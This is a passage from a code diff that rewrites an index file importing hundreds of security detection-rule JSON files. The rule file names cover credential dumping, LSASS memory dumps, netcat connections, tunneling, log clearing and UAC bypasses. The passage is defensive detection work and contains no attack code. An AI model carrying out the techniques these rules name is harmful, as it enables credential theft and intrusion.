'./command_and_control_teamviewer_remote_file_copy.json'; -import rule262 from './defense_evasion_installutil_beacon.json'; -import rule263 from './defense_evasion_mshta_beacon.json'; -import rule264 from './defense_evasion_network_connection_from_windows_binary.json'; -import rule265 from './defense_evasion_rundll32_no_arguments.json'; -import rule266 from './defense_evasion_suspicious_scrobj_load.json'; -import rule267 from './defense_evasion_suspicious_wmi_script.json'; -import rule268 from './execution_ms_office_written_file.json'; -import rule269 from './execution_pdf_written_file.json'; -import rule270 from './lateral_movement_cmd_service.json'; -import rule271 from './persistence_app_compat_shim.json'; -import rule272 from './command_and_control_remote_file_copy_desktopimgdownldr.json'; -import rule273 from './command_and_control_remote_file_copy_mpcmdrun.json'; -import rule274 from './defense_evasion_execution_suspicious_explorer_winword.json'; -import rule275 from './defense_evasion_suspicious_zoom_child_process.json'; -import rule276 from './ml_linux_anomalous_compiler_activity.json'; -import rule277 from './ml_linux_anomalous_sudo_activity.json'; -import rule278 from './ml_linux_system_information_discovery.json'; -import rule279 from './ml_linux_system_network_configuration_discovery.json'; -import rule280 from './ml_linux_system_network_connection_discovery.json'; -import rule281 from './ml_linux_system_process_discovery.json'; -import rule282 from './ml_linux_system_user_discovery.json'; -import rule283 from './discovery_post_exploitation_external_ip_lookup.json'; -import rule284 from './initial_access_zoom_meeting_with_no_passcode.json'; -import rule285 from './defense_evasion_gcp_logging_sink_deletion.json'; -import rule286 from './defense_evasion_gcp_pub_sub_topic_deletion.json'; -import rule287 from './defense_evasion_gcp_firewall_rule_created.json'; -import rule288 from './defense_evasion_gcp_firewall_rule_deleted.json'; -import rule289 from './defense_evasion_gcp_firewall_rule_modified.json'; -import rule290 from './defense_evasion_gcp_logging_bucket_deletion.json'; -import rule291 from './defense_evasion_gcp_storage_bucket_permissions_modified.json'; -import rule292 from './impact_gcp_storage_bucket_deleted.json'; -import rule293 from './initial_access_gcp_iam_custom_role_creation.json'; -import rule294 from './persistence_gcp_iam_service_account_key_deletion.json'; -import rule295 from './persistence_gcp_key_created_for_service_account.json'; -import rule296 from './defense_evasion_gcp_storage_bucket_configuration_modified.json'; -import rule297 from './exfiltration_gcp_logging_sink_modification.json'; -import rule298 from './impact_gcp_iam_role_deletion.json'; -import rule299 from './impact_gcp_service_account_deleted.json'; -import rule300 from './impact_gcp_service_account_disabled.json'; -import rule301 from './impact_gcp_virtual_private_cloud_network_deleted.json'; -import rule302 from './impact_gcp_virtual_private_cloud_route_created.json'; -import rule303 from './impact_gcp_virtual_private_cloud_route_deleted.json'; -import rule304 from './ml_linux_anomalous_metadata_process.json'; -import rule305 from './ml_linux_anomalous_metadata_user.json'; -import rule306 from './ml_windows_anomalous_metadata_process.json'; -import rule307 from './ml_windows_anomalous_metadata_user.json'; -import rule308 from './persistence_gcp_service_account_created.json'; -import rule309 from './collection_gcp_pub_sub_subscription_creation.json'; -import rule310 from './collection_gcp_pub_sub_topic_creation.json'; -import rule311 from './defense_evasion_gcp_pub_sub_subscription_deletion.json'; -import rule312 from './persistence_azure_pim_user_added_global_admin.json'; -import rule313 from './command_and_control_cobalt_strike_default_teamserver_cert.json'; -import rule314 from './defense_evasion_enable_inbound_rdp_with_netsh.json'; -import rule315 from './defense_evasion_execution_lolbas_wuauclt.json'; -import rule316 from './privilege_escalation_unusual_svchost_childproc_childless.json'; -import rule317 from './command_and_control_rdp_tunnel_plink.json'; -import rule318 from './privilege_escalation_uac_bypass_winfw_mmc_hijack.json'; -import rule319 from './discovery_privileged_localgroup_membership.json'; -import rule320 from './persistence_ms_office_addins_file.json'; -import rule321 from './discovery_adfind_command_activity.json'; -import rule322 from './discovery_security_software_wmic.json'; -import rule323 from './execution_command_shell_via_rundll32.json'; -import rule324 from './execution_suspicious_cmd_wmi.json'; -import rule325 from './lateral_movement_via_startup_folder_rdp_smb.json'; -import rule326 from './privilege_escalation_uac_bypass_com_interface_icmluautil.json'; -import rule327 from './privilege_escalation_uac_bypass_mock_windir.json'; -import rule328 from './defense_evasion_potential_processherpaderping.json'; -import rule329 from './privilege_escalation_uac_bypass_dll_sideloading.json'; -import rule330 from './execution_shared_modules_local_sxs_dll.json'; -import rule331 from './privilege_escalation_uac_bypass_com_clipup.json'; -import rule332 from './initial_access_via_explorer_suspicious_child_parent_args.json'; -import rule333 from './execution_from_unusual_directory.json'; -import rule334 from './execution_from_unusual_path_cmdline.json'; -import rule335 from './credential_access_kerberoasting_unusual_process.json'; -import rule336 from './discovery_peripheral_device.json'; -import rule337 from './lateral_movement_mount_hidden_or_webdav_share_net.json'; -import rule338 from './defense_evasion_deleting_websvr_access_logs.json'; -import rule339 from './defense_evasion_log_files_deleted.json'; -import rule340 from './defense_evasion_timestomp_touch.json'; -import rule341 from './lateral_movement_dcom_hta.json'; -import rule342 from './lateral_movement_execution_via_file_shares_sequence.json'; -import rule343 from './privilege_escalation_uac_bypass_com_ieinstal.json'; -import rule344 from './command_and_control_common_webservices.json'; -import rule345 from './command_and_control_encrypted_channel_freesslcert.json'; -import rule346 from './defense_evasion_process_termination_followed_by_deletion.json'; -import rule347 from './lateral_movement_remote_file_copy_hidden_share.json'; -import rule348 from './attempt_to_deactivate_okta_network_zone.json'; -import rule349 from './attempt_to_delete_okta_network_zone.json'; -import rule350 from './lateral_movement_dcom_mmc20.json'; -import rule351 from './lateral_movement_dcom_shellwindow_shellbrowserwindow.json'; -import rule352 from './okta_attempt_to_deactivate_okta_application.json'; -import rule353 from './okta_attempt_to_delete_okta_application.json'; -import rule354 from './okta_attempt_to_delete_okta_policy_rule.json'; -import rule355 from './okta_attempt_to_modify_okta_application.json'; -import rule356 from './persistence_administrator_role_assigned_to_okta_user.json'; -import rule357 from './lateral_movement_executable_tool_transfer_smb.json'; -import rule358 from './command_and_control_dns_tunneling_nslookup.json'; -import rule359 from './lateral_movement_execution_from_tsclient_mup.json'; -import rule360 from './lateral_movement_rdp_sharprdp_target.json'; -import rule361 from './defense_evasion_clearing_windows_security_logs.json'; -import rule362 from './persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json'; -import rule363 from './execution_suspicious_short_program_name.json'; -import rule364 from './lateral_movement_incoming_wmi.json'; -import rule365 from './persistence_via_hidden_run_key_valuename.json'; -import rule366 from './credential_access_potential_ssh_bruteforce.json'; -import rule367 from './credential_access_promt_for_pwd_via_osascript.json'; -import rule368 from './lateral_movement_remote_services.json'; -import rule369 from './application_added_to_google_workspace_domain.json'; -import rule370 from './domain_added_to_google_workspace_trusted_domains.json'; -import rule371 from './execution_suspicious_image_load_wmi_ms_office.json'; -import rule372 from './execution_suspicious_powershell_imgload.json'; -import rule373 from './google_workspace_admin_role_deletion.json'; -import rule374 from './google_workspace_mfa_enforcement_disabled.json'; -import rule375 from './google_workspace_policy_modified.json'; -import rule376 from './mfa_disabled_for_google_workspace_organization.json'; -import rule377 from './persistence_evasion_registry_ifeo_injection.json'; -import rule378 from './persistence_google_workspace_admin_role_assigned_to_user.json'; -import rule379 from './persistence_google_workspace_custom_admin_role_created.json'; -import rule380 from './persistence_google_workspace_role_modified.json'; -import rule381 from './persistence_suspicious_image_load_scheduled_task_ms_office.json'; -import rule382 from './defense_evasion_masquerading_trusted_directory.json'; -import rule383 from './exfiltration_microsoft_365_exchange_transport_rule_creation.json'; -import rule384 from './initial_access_microsoft_365_exchange_safelinks_disabled.json'; -import rule385 from './microsoft_365_exchange_dkim_signing_config_disabled.json'; -import rule386 from './persistence_appcertdlls_registry.json'; -import rule387 from './persistence_appinitdlls_registry.json'; -import rule388 from './persistence_registry_uncommon.json'; -import rule389 from './persistence_run_key_and_startup_broad.json'; -import rule390 from './persistence_services_registry.json'; -import rule391 from './persistence_startup_folder_file_written_by_suspicious_process.json'; -import rule392 from './persistence_startup_folder_scripts.json'; -import rule393 from './persistence_suspicious_com_hijack_registry.json'; -import rule394 from './persistence_via_lsa_security_support_provider_registry.json'; -import rule395 from './defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json'; -import rule396 from './defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json'; -import rule397 from './defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json'; -import rule398 from './exfiltration_microsoft_365_exchange_transport_rule_mod.json'; -import rule399 from './initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json'; -import rule400 from './initial_access_microsoft_365_exchange_anti_phish_rule_mod.json'; -import rule401 from './lateral_movement_suspicious_rdp_client_imageload.json'; -import rule402 from './persistence_runtime_run_key_startup_susp_procs.json'; -import rule403 from './persistence_suspicious_scheduled_task_runtime.json'; -import rule404 from './defense_evasion_microsoft_365_exchange_dlp_policy_removed.json'; -import rule405 from './lateral_movement_scheduled_task_target.json'; -import rule406 from './persistence_microsoft_365_exchange_management_role_assignment.json'; -import rule407 from './persistence_microsoft_365_teams_guest_access_enabled.json'; -import rule408 from './credential_access_dump_registry_hives.json'; -import rule409 from './defense_evasion_scheduledjobs_at_protocol_enabled.json'; -import rule410 from './persistence_ms_outlook_vba_template.json'; -import rule411 from './persistence_suspicious_service_created_registry.json'; -import rule412 from './privilege_escalation_named_pipe_impersonation.json'; -import rule413 from './credential_access_cmdline_dump_tool.json'; -import rule414 from './credential_access_copy_ntds_sam_volshadowcp_cmdline.json'; -import rule415 from './credential_access_lsass_memdump_file_created.json'; -import rule416 from './lateral_movement_incoming_winrm_shell_execution.json'; -import rule417 from './lateral_movement_powershell_remoting_target.json'; -import rule418 from './command_and_control_port_forwarding_added_registry.json'; -import rule419 from './defense_evasion_hide_encoded_executable_registry.json'; -import rule420 from './lateral_movement_rdp_enabled_registry.json'; -import rule421 from './privilege_escalation_printspooler_registry_copyfiles.json'; -import rule422 from './privilege_escalation_rogue_windir_environment_var.json'; -import rule423 from './initial_access_scripts_process_started_via_wmi.json'; -import rule424 from './command_and_control_iexplore_via_com.json'; -import rule425 from './command_and_control_remote_file_copy_scripts.json'; -import rule426 from './persistence_local_scheduled_task_scripting.json'; -import rule427 from './persistence_startup_folder_file_written_by_unsigned_process.json'; -import rule428 from './command_and_control_remote_file_copy_powershell.json'; -import rule429 from './credential_access_microsoft_365_brute_force_user_account_attempt.json'; -import rule430 from './microsoft_365_teams_custom_app_interaction_allowed.json'; -import rule431 from './persistence_microsoft_365_teams_external_access_enabled.json'; -import rule432 from './credential_access_microsoft_365_potential_password_spraying_attack.json'; -import rule433 from './impact_stop_process_service_threshold.json'; -import rule434 from './collection_winrar_encryption.json'; -import rule435 from './defense_evasion_unusual_dir_ads.json'; -import rule436 from './discovery_admin_recon.json'; -import rule437 from './discovery_file_dir_discovery.json'; -import rule438 from './discovery_net_view.json'; -import rule439 from './discovery_remote_system_discovery_commands_windows.json'; -import rule440 from './persistence_via_windows_management_instrumentation_event_subscription.json'; -import rule441 from './credential_access_mimikatz_powershell_module.json'; -import rule442 from './execution_scripting_osascript_exec_followed_by_netcon.json'; -import rule443 from './execution_shell_execution_via_apple_scripting.json'; -import rule444 from './persistence_creation_change_launch_agents_file.json'; -import rule445 from './persistence_creation_modif_launch_deamon_sequence.json'; -import rule446 from './persistence_folder_action_scripts_runtime.json'; -import rule447 from './persistence_login_logout_hooks_defaults.json'; -import rule448 from './privilege_escalation_explicit_creds_via_scripting.json'; -import rule449 from './command_and_control_sunburst_c2_activity_detected.json'; -import rule450 from './defense_evasion_azure_application_credential_modification.json'; -import rule451 from './defense_evasion_azure_service_principal_addition.json'; -import rule452 from './defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json'; -import rule453 from './execution_apt_solarwinds_backdoor_child_cmd_powershell.json'; -import rule454 from './execution_apt_solarwinds_backdoor_unusual_child_processes.json'; -import rule455 from './initial_access_azure_active_directory_powershell_signin.json'; -import rule456 from './collection_email_powershell_exchange_mailbox.json'; -import rule457 from './execution_scheduled_task_powershell_source.json'; -import rule458 from './persistence_powershell_exch_mailbox_activesync_add_device.json'; -import rule459 from './persistence_docker_shortcuts_plist_modification.json'; -import rule460 from './persistence_evasion_hidden_local_account_creation.json'; -import rule461 from './persistence_finder_sync_plugin_pluginkit.json'; -import rule462 from './discovery_security_software_grep.json'; -import rule463 from './credential_access_cookies_chromium_browsers_debugging.json'; -import rule464 from './credential_access_ssh_backdoor_log.json'; -import rule465 from './persistence_credential_access_modify_auth_module_or_config.json'; -import rule466 from './persistence_credential_access_modify_ssh_binaries.json'; -import rule467 from './credential_access_collection_sensitive_files.json'; -import rule468 from './persistence_ssh_authorized_keys_modification.json'; -import rule469 from './defense_evasion_defender_disabled_via_registry.json'; -import rule470 from './defense_evasion_privacy_controls_tcc_database_modification.json'; -import rule471 from './execution_initial_access_suspicious_browser_childproc.json'; -import rule472 from './execution_script_via_automator_workflows.json'; -import rule473 from './persistence_modification_sublime_app_plugin_or_script.json'; -import rule474 from './privilege_escalation_applescript_with_admin_privs.json'; -import rule475 from './credential_access_dumping_keychain_security.json'; -import rule476 from './initial_access_azure_active_directory_high_risk_signin.json'; -import rule477 from './initial_access_suspicious_mac_ms_office_child_process.json'; -import rule478 from './credential_access_mitm_localhost_webproxy.json'; -import rule479 from './persistence_kde_autostart_modification.json'; -import rule480 from './persistence_user_account_added_to_privileged_group_ad.json'; -import rule481 from './defense_evasion_attempt_to_disable_gatekeeper.json'; -import rule482 from './defense_evasion_sandboxed_office_app_suspicious_zip_file.json'; -import rule483 from './persistence_emond_rules_file_creation.json'; -import rule484 from './persistence_emond_rules_process_execution.json'; -import rule485 from './discovery_users_domain_built_in_commands.json'; -import rule486 from './execution_pentest_eggshell_remote_admin_tool.json'; -import rule487 from './defense_evasion_install_root_certificate.json'; -import rule488 from './persistence_credential_access_authorization_plugin_creation.json'; -import rule489 from './persistence_directory_services_plugins_modification.json'; -import rule490 from './defense_evasion_modify_environment_launchctl.json'; -import rule491 from './defense_evasion_safari_config_change.json'; -import rule492 from './defense_evasion_apple_softupdates_modification.json'; -import rule493 from './credential_access_mod_wdigest_security_provider.json'; -import rule494 from './credential_access_saved_creds_vaultcmd.json'; -import rule495 from './defense_evasion_file_creation_mult_extension.json'; -import rule496 from './execution_enumeration_via_wmiprvse.json'; -import rule497 from './execution_suspicious_jar_child_process.json'; -import rule498 from './persistence_shell_profile_modification.json'; -import rule499 from './persistence_suspicious_calendar_modification.json'; -import rule500 from './persistence_time_provider_mod.json'; -import rule501 from './privilege_escalation_exploit_adobe_acrobat_updater.json'; -import rule502 from './defense_evasion_sip_provider_mod.json'; -import rule503 from './execution_com_object_xwizard.json'; -import rule504 from './privilege_escalation_disable_uac_registry.json'; -import rule505 from './defense_evasion_unusual_ads_file_creation.json'; -import rule506 from './persistence_loginwindow_plist_modification.json'; -import rule507 from './persistence_periodic_tasks_file_mdofiy.json'; -import rule508 from './persistence_via_atom_init_file_modification.json'; -import rule509 from './privilege_escalation_lsa_auth_package.json'; -import rule510 from './privilege_escalation_port_monitor_print_pocessor_abuse.json'; -import rule511 from './credential_access_dumping_hashes_bi_cmds.json'; -import rule512 from './lateral_movement_mounting_smb_share.json'; -import rule513 from './privilege_escalation_echo_nopasswd_sudoers.json'; -import rule514 from './privilege_escalation_ld_preload_shared_object_modif.json'; -import rule515 from './privilege_escalation_root_crontab_filemod.json'; -import rule516 from './defense_evasion_create_mod_root_certificate.json'; -import rule517 from './privilege_escalation_sudo_buffer_overflow.json'; -import rule518 from './execution_installer_spawned_network_event.json'; -import rule519 from './initial_access_suspicious_ms_exchange_files.json'; -import rule520 from './initial_access_suspicious_ms_exchange_process.json'; -import rule521 from './initial_access_suspicious_ms_exchange_worker_child_process.json'; -import rule522 from './persistence_evasion_registry_startup_shell_folder_modified.json'; -import rule523 from './persistence_local_scheduled_job_creation.json'; -import rule524 from './persistence_via_wmi_stdregprov_run_services.json'; -import rule525 from './credential_access_persistence_network_logon_provider_modification.json'; -import rule526 from './lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json'; -import rule527 from './collection_microsoft_365_new_inbox_rule.json'; -import rule528 from './ml_high_count_network_denies.json'; -import rule529 from './ml_high_count_network_events.json'; -import rule530 from './ml_rare_destination_country.json'; -import rule531 from './ml_spike_in_traffic_to_a_country.json'; -import rule532 from './command_and_control_tunneling_via_earthworm.json'; -import rule533 from './lateral_movement_evasion_rdp_shadowing.json'; -import rule534 from './threat_intel_fleet_integrations.json'; -import rule535 from './exfiltration_ec2_vm_export_failure.json'; -import rule536 from './exfiltration_ec2_full_network_packet_capture_detected.json'; -import rule537 from './impact_azure_service_principal_credentials_added.json'; -import rule538 from './persistence_ec2_security_group_configuration_change_detection.json'; -import rule539 from './defense_evasion_disabling_windows_logs.json'; -import rule540 from './persistence_route_53_domain_transfer_lock_disabled.json'; -import rule541 from './persistence_route_53_domain_transferred_to_another_account.json'; -import rule542 from './initial_access_okta_user_attempted_unauthorized_access.json'; -import rule543 from './credential_access_user_excessive_sso_logon_errors.json'; -import rule544 from './persistence_exchange_suspicious_mailbox_right_delegation.json'; -import rule545 from './privilege_escalation_new_or_modified_federation_domain.json'; -import rule546 from './privilege_escalation_sts_assumerole_usage.json'; -import rule547 from './privilege_escalation_sts_getsessiontoken_abuse.json'; -import rule548 from './defense_evasion_suspicious_execution_from_mounted_device.json'; -import rule549 from './defense_evasion_unusual_network_connection_via_dllhost.json'; -import rule550 from './defense_evasion_amsienable_key_mod.json'; -import rule551 from './impact_rds_group_deletion.json'; -import rule552 from './persistence_rds_group_creation.json'; -import rule553 from './persistence_route_table_created.json'; -import rule554 from './persistence_route_table_modified_or_deleted.json'; -import rule555 from './exfiltration_rds_snapshot_export.json'; -import rule556 from './persistence_rds_instance_creation.json'; -import rule557 from './privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json'; -import rule558 from './ml_auth_rare_hour_for_a_user_to_logon.json'; -import rule559 from './ml_auth_rare_source_ip_for_a_user.json'; -import rule560 from './ml_auth_rare_user_logon.json'; -import rule561 from './ml_auth_spike_in_failed_logon_events.json'; -import rule562 from './ml_auth_spike_in_logon_events.json'; -import rule563 from './ml_auth_spike_in_logon_events_from_a_source_ip.json'; -import rule564 from './privilege_escalation_cyberarkpas_error_audit_event_promotion.json'; -import rule565 from './privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json'; -import rule566 from './defense_evasion_kubernetes_events_deleted.json'; -import rule567 from './impact_kubernetes_pod_deleted.json'; -import rule568 from './exfiltration_rds_snapshot_restored.json'; -import rule569 from './privilege_escalation_printspooler_suspicious_file_deletion.json'; -import rule570 from './privilege_escalation_unusual_printspooler_childprocess.json'; -import rule571 from './defense_evasion_disabling_windows_defender_powershell.json'; -import rule572 from './defense_evasion_enable_network_discovery_with_netsh.json'; -import rule573 from './defense_evasion_execution_windefend_unusual_path.json'; -import rule574 from './defense_evasion_agent_spoofing_mismatched_id.json'; -import rule575 from './defense_evasion_agent_spoofing_multiple_hosts.json'; -import rule576 from './defense_evasion_parent_process_pid_spoofing.json'; -import rule577 from './impact_microsoft_365_potential_ransomware_activity.json'; -import rule578 from './impact_microsoft_365_unusual_volume_of_file_deletion.json'; -import rule579 from './initial_access_microsoft_365_user_restricted_from_sending_email.json'; -import rule580 from './defense_evasion_elasticache_security_group_creation.json'; -import rule581 from './defense_evasion_elasticache_security_group_modified_or_deleted.json'; -import rule582 from './impact_volume_shadow_copy_deletion_via_powershell.json'; -import rule583 from './persistence_route_53_hosted_zone_associated_with_a_vpc.json'; -import rule584 from './defense_evasion_defender_exclusion_via_powershell.json'; -import rule585 from './defense_evasion_dns_over_https_enabled.json'; -import rule586 from './defense_evasion_whitespace_padding_in_command_line.json'; -import rule587 from './defense_evasion_frontdoor_firewall_policy_deletion.json'; -import rule588 from './credential_access_azure_full_network_packet_capture_detected.json'; -import rule589 from './persistence_webshell_detection.json'; -import rule590 from './defense_evasion_suppression_rule_created.json'; -import rule591 from './impact_efs_filesystem_or_mount_deleted.json'; -import rule592 from './defense_evasion_execution_control_panel_suspicious_args.json'; -import rule593 from './defense_evasion_azure_blob_permissions_modified.json'; -import rule594 from './privilege_escalation_aws_suspicious_saml_activity.json'; -import rule595 from './credential_access_potential_lsa_memdump_via_mirrordump.json'; -import rule596 from './discovery_virtual_machine_fingerprinting_grep.json'; -import rule597 from './impact_backup_file_deletion.json'; -import rule598 from './credential_access_posh_minidump.json'; -import rule599 from './persistence_screensaver_engine_unexpected_child_process.json'; -import rule600 from './persistence_screensaver_plist_file_modification.json'; -import rule601 from './credential_access_suspicious_lsass_access_memdump.json'; -import rule602 from './defense_evasion_suspicious_process_access_direct_syscall.json'; -import rule603 from './discovery_posh_suspicious_api_functions.json'; -import rule604 from './privilege_escalation_via_rogue_named_pipe.json'; -import rule605 from './credential_access_suspicious_lsass_access_via_snapshot.json'; -import rule606 from './defense_evasion_posh_process_injection.json'; -import rule607 from './collection_posh_keylogger.json'; -import rule608 from './defense_evasion_posh_assembly_load.json'; -import rule609 from './defense_evasion_powershell_windows_firewall_disabled.json'; -import rule610 from './execution_posh_portable_executable.json'; -import rule611 from './execution_posh_psreflect.json'; -import rule612 from './credential_access_suspicious_comsvcs_imageload.json'; -import rule613 from './impact_aws_eventbridge_rule_disabled_or_deleted.json'; -import rule614 from './defense_evasion_microsoft_defender_tampering.json'; -import rule615 from './initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json'; -import rule616 from './persistence_remote_password_reset.json'; -import rule617 from './privilege_escalation_azure_kubernetes_rolebinding_created.json'; -import rule618 from './collection_posh_audio_capture.json'; -import rule619 from './collection_posh_screen_grabber.json'; -import rule620 from './defense_evasion_posh_compressed.json'; -import rule621 from './defense_evasion_suspicious_process_creation_calltrace.json'; -import rule622 from './privilege_escalation_group_policy_iniscript.json'; -import rule623 from './privilege_escalation_group_policy_privileged_groups.json'; -import rule624 from './privilege_escalation_group_policy_scheduled_task.json'; -import rule625 from './defense_evasion_clearing_windows_console_history.json'; -import rule626 from './threat_intel_filebeat8x.json'; -import rule627 from './privilege_escalation_installertakeover.json'; -import rule628 from './credential_access_via_snapshot_lsass_clone_creation.json'; -import rule629 from './persistence_via_bits_job_notify_command.json'; -import rule630 from './execution_suspicious_java_netcon_childproc.json'; -import rule631 from './privilege_escalation_samaccountname_spoofing_attack.json'; -import rule632 from './credential_access_symbolic_link_to_shadow_copy_created.json'; -import rule633 from './credential_access_mfa_push_brute_force.json'; -import rule634 from './persistence_azure_global_administrator_role_assigned.json'; -import rule635 from './persistence_microsoft_365_global_administrator_role_assign.json'; -import rule636 from './lateral_movement_malware_uploaded_onedrive.json'; -import rule637 from './lateral_movement_malware_uploaded_sharepoint.json'; -import rule638 from './defense_evasion_ms_office_suspicious_regmod.json'; -import rule639 from './initial_access_o365_user_reported_phish_malware.json'; -import rule640 from './defense_evasion_microsoft_365_mailboxauditbypassassociation.json'; -import rule641 from './credential_access_disable_kerberos_preauth.json'; -import rule642 from './credential_access_posh_request_ticket.json'; -import rule643 from './credential_access_shadow_credentials.json'; -import rule644 from './privilege_escalation_pkexec_envar_hijack.json'; -import rule645 from './credential_access_seenabledelegationprivilege_assigned_to_user.json'; -import rule646 from './persistence_msds_alloweddelegateto_krbtgt.json'; -import rule647 from './defense_evasion_disable_posh_scriptblocklogging.json'; -import rule648 from './persistence_ad_adminsdholder.json'; -import rule649 from './privilege_escalation_windows_service_via_unusual_client.json'; -import rule650 from './credential_access_dcsync_replication_rights.json'; -import rule651 from './credential_access_lsass_memdump_handle_access.json'; -import rule652 from './credential_access_moving_registry_hive_via_smb.json'; -import rule653 from './credential_access_suspicious_winreg_access_via_sebackup_priv.json'; -import rule654 from './credential_access_spn_attribute_modified.json'; -import rule655 from './persistence_dontexpirepasswd_account.json'; -import rule656 from './persistence_sdprop_exclusion_dsheuristics.json'; -import rule657 from './credential_access_remote_sam_secretsdump.json'; -import rule658 from './defense_evasion_workfolders_control_execution.json'; -import rule659 from './credential_access_user_impersonation_access.json'; -import rule660 from './persistence_redshift_instance_creation.json'; -import rule661 from './persistence_crontab_creation.json'; -import rule662 from './privilege_escalation_krbrelayup_suspicious_logon.json'; -import rule663 from './privilege_escalation_krbrelayup_service_creation.json'; -import rule664 from './credential_access_relay_ntlm_auth_via_http_spoolss.json'; -import rule665 from './execution_shell_evasion_linux_binary.json'; -import rule666 from './execution_process_started_in_shared_memory_directory.json'; -import rule667 from './execution_abnormal_process_id_file_created.json'; -import rule668 from './execution_process_started_from_process_id_file.json'; -import rule669 from './privilege_escalation_suspicious_dnshostname_update.json'; -import rule670 from './command_and_control_connection_attempt_by_non_ssh_root_session.json'; -import rule671 from './execution_user_exec_to_pod.json'; -import rule672 from './defense_evasion_elastic_agent_service_terminated.json'; -import rule673 from './defense_evasion_proxy_execution_via_msdt.json'; +import rule29 from './credential_access_endgame_cred_dumping_detected.json'; +import rule30 from './credential_access_endgame_cred_dumping_prevented.json'; +import rule31 from './defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json'; +import rule32 from './defense_evasion_clearing_windows_event_logs.json'; +import rule33 from './defense_evasion_delete_volume_usn_journal_with_fsutil.json'; +import rule34 from './defense_evasion_disable_windows_firewall_rules_with_netsh.json'; +import rule35 from './defense_evasion_misc_lolbin_connecting_to_the_internet.json'; +import rule36 from './defense_evasion_msbuild_making_network_connections.json'; +import rule37 from './defense_evasion_suspicious_certutil_commands.json'; +import rule38 from './defense_evasion_unusual_network_connection_via_rundll32.json'; +import rule39 from './defense_evasion_unusual_process_network_connection.json'; +import rule40 from './defense_evasion_via_filter_manager.json'; +import rule41 from './discovery_linux_hping_activity.json'; +import rule42 from './discovery_linux_nping_activity.json'; +import rule43 from './discovery_whoami_command_activity.json'; +import rule44 from './endgame_adversary_behavior_detected.json'; +import rule45 from './endgame_malware_detected.json'; +import rule46 from './endgame_malware_prevented.json'; +import rule47 from './endgame_ransomware_detected.json'; +import rule48 from './endgame_ransomware_prevented.json'; +import rule49 from './execution_command_prompt_connecting_to_the_internet.json'; +import rule50 from './execution_command_shell_started_by_svchost.json'; +import rule51 from './execution_endgame_exploit_detected.json'; +import rule52 from './execution_endgame_exploit_prevented.json'; +import rule53 from './execution_html_help_executable_program_connecting_to_the_internet.json'; +import rule54 from './execution_linux_netcat_network_connection.json'; +import rule55 from './execution_psexec_lateral_movement_command.json'; +import rule56 from './execution_register_server_program_connecting_to_the_internet.json'; +import rule57 from './execution_via_compiled_html_file.json'; +import rule58 from './impact_deleting_backup_catalogs_with_wbadmin.json'; +import rule59 from './impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json'; +import rule60 from './impact_volume_shadow_copy_deletion_via_wmic.json'; +import rule61 from './initial_access_rpc_remote_procedure_call_from_the_internet.json'; +import rule62 from './initial_access_rpc_remote_procedure_call_to_the_internet.json'; +import rule63 from './initial_access_script_executing_powershell.json'; +import rule64 from './initial_access_smb_windows_file_sharing_activity_to_the_internet.json'; +import rule65 from './initial_access_suspicious_ms_office_child_process.json'; +import rule66 from './initial_access_suspicious_ms_outlook_child_process.json'; +import rule67 from './lateral_movement_direct_outbound_smb_connection.json'; +import rule68 from './lateral_movement_service_control_spawned_script_int.json'; +import rule69 from './persistence_adobe_hijack_persistence.json'; +import rule70 from './persistence_local_scheduled_task_creation.json'; +import rule71 from './persistence_priv_escalation_via_accessibility_features.json'; +import rule72 from './persistence_shell_activity_by_web_server.json'; +import rule73 from './persistence_system_shells_via_services.json'; +import rule74 from './persistence_user_account_creation.json'; +import rule75 from './persistence_via_application_shimming.json'; +import rule76 from './privilege_escalation_endgame_cred_manipulation_detected.json'; +import rule77 from './privilege_escalation_endgame_cred_manipulation_prevented.json'; +import rule78 from './privilege_escalation_endgame_permission_theft_detected.json'; +import rule79 from './privilege_escalation_endgame_permission_theft_prevented.json'; +import rule80 from './privilege_escalation_endgame_process_injection_detected.json'; +import rule81 from './privilege_escalation_endgame_process_injection_prevented.json'; +import rule82 from './privilege_escalation_unusual_parentchild_relationship.json'; +import rule83 from './impact_modification_of_boot_config.json'; +import rule84 from './privilege_escalation_uac_bypass_event_viewer.json'; +import rule85 from './defense_evasion_msxsl_network.json'; +import rule86 from './discovery_command_system_account.json'; +import rule87 from './command_and_control_certutil_network_connection.json'; +import rule88 from './defense_evasion_cve_2020_0601.json'; +import rule89 from './command_and_control_ml_packetbeat_dns_tunneling.json'; +import rule90 from './command_and_control_ml_packetbeat_rare_dns_question.json'; +import rule91 from './command_and_control_ml_packetbeat_rare_urls.json'; +import rule92 from './command_and_control_ml_packetbeat_rare_user_agent.json'; +import rule93 from './credential_access_credential_dumping_msbuild.json'; +import rule94 from './credential_access_ml_suspicious_login_activity.json'; +import rule95 from './defense_evasion_execution_msbuild_started_by_office_app.json'; +import rule96 from './defense_evasion_execution_msbuild_started_by_script.json'; +import rule97 from './defense_evasion_execution_msbuild_started_by_system_process.json'; +import rule98 from './defense_evasion_execution_msbuild_started_renamed.json'; +import rule99 from './defense_evasion_execution_msbuild_started_unusal_process.json'; +import rule100 from './defense_evasion_injection_msbuild.json'; +import rule101 from './execution_ml_windows_anomalous_script.json'; +import rule102 from './initial_access_ml_linux_anomalous_user_name.json'; +import rule103 from './initial_access_ml_windows_anomalous_user_name.json'; +import rule104 from './initial_access_ml_windows_rare_user_type10_remote_login.json'; +import rule105 from './ml_linux_anomalous_network_activity.json'; +import rule106 from './ml_linux_anomalous_network_port_activity.json'; +import rule107 from './ml_packetbeat_rare_server_domain.json'; +import rule108 from './ml_windows_anomalous_network_activity.json'; +import rule109 from './persistence_ml_linux_anomalous_process_all_hosts.json'; +import rule110 from './persistence_ml_rare_process_by_host_linux.json'; +import rule111 from './persistence_ml_rare_process_by_host_windows.json'; +import rule112 from './persistence_ml_windows_anomalous_path_activity.json'; +import rule113 from './persistence_ml_windows_anomalous_process_all_hosts.json'; +import rule114 from './persistence_ml_windows_anomalous_process_creation.json'; +import rule115 from 